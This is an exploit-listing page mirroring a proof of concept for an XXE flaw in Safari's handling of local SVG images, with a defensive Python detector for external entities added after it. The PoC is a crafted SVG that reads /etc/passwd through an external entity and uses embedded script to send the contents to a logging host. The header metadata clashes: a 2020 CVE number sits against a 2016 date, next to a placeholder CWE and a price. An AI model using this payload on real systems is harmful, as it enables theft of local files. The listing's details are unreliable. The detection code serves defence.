Apple Safari for Mac OS X SVG local XXE PoC

CVE: CVE-2020-9999
Category: CWE-XX
Price: $500
Severity: Critical
Author: Exploit Researcher
Risk: High
Exploitation Type: Local
Date: 2016-07-05
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2016070019

Below is a copy:

Apple Safari for Mac OS X SVG local XXE PoC

Safari for Mac OS X is prone to an XXE vulnerability when processing crafted SVG images.
An attacker may use this vulnerability to steal files from the local computer by tricking a user into opening an SVG image from a local location (i.e. USB key).
This vulnerability is mitigated by file quarantine and does not work with downloaded files.

PoC:
------------------------------------------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [  
<!ELEMENT svg ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="19000px" xmlns:xlink="http://www.w3.org/1999/xlink" >
<text x="-1000" y="-1000" >&xxe;</text>
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
<script>
var logger = "http://logger.local/?file=" + encodeURIComponent(document.getElementsByTagName("text")[0].innerHTML);
document.createElementNS('http://www.w3.org/2000/svg','image').setAttributeNS('http://www.w3.org/1999/xlink','href', logger);

</script>

</svg>
------------------------------------------------
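
For triage of SVG files arriving from local media, the pattern in the PoC (an external entity declared in the DOCTYPE and referenced in the body) can be detected without resolving anything. The following is an added example, not part of the original advisory; the function names `inspect_svg` and `should_quarantine`, the quarantine policy and both sample documents are assumptions constructed for illustration.

```python
import xml.parsers.expat as expat

SVG_NS = "http://www.w3.org/2000/svg"
# Constructed sample input (not from the advisory): one external entity, used once.
SAMPLE_FLAGGED = b"""<!DOCTYPE svg [
  <!ENTITY ext SYSTEM "file:///constructed/placeholder.txt">
]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&ext;</text><script/></svg>"""
SAMPLE_CLEAN = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>'

def inspect_svg(data: bytes) -> dict:
    """Report external entities and script elements without loading any entity."""
    report = {"external_entities": {}, "referenced": [], "scripts": 0, "error": None}
    parser = expat.ParserCreate(namespace_separator=" ")

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # value is None for an external entity; system_id holds its URI.
        if value is None and system_id is not None:
            report["external_entities"][name] = system_id

    def on_external_ref(context, base, system_id, public_id):
        # Fired when the body uses an external entity. Returning 1 lets the
        # parse continue; nothing is opened or fetched.
        report["referenced"].append(system_id)
        return 1

    def on_start(name, attrs):
        ns, _, local = name.rpartition(" ")
        if local == "script" and ns in ("", SVG_NS):
            report["scripts"] += 1

    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        report["error"] = str(exc)  # malformed XML is reported, not trusted
    return report

def should_quarantine(report: dict) -> bool:
    """Hypothetical policy: hold files that declare external entities or fail to parse."""
    return bool(report["external_entities"]) or report["error"] is not None

if __name__ == "__main__":
    for label, doc in (("flagged", SAMPLE_FLAGGED), ("clean", SAMPLE_CLEAN)):
        print(label, inspect_svg(doc), should_quarantine(inspect_svg(doc)))
```

The script count is informational only: a script element alone is common in legitimate SVG, while an external entity declaration in an image file rarely is.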



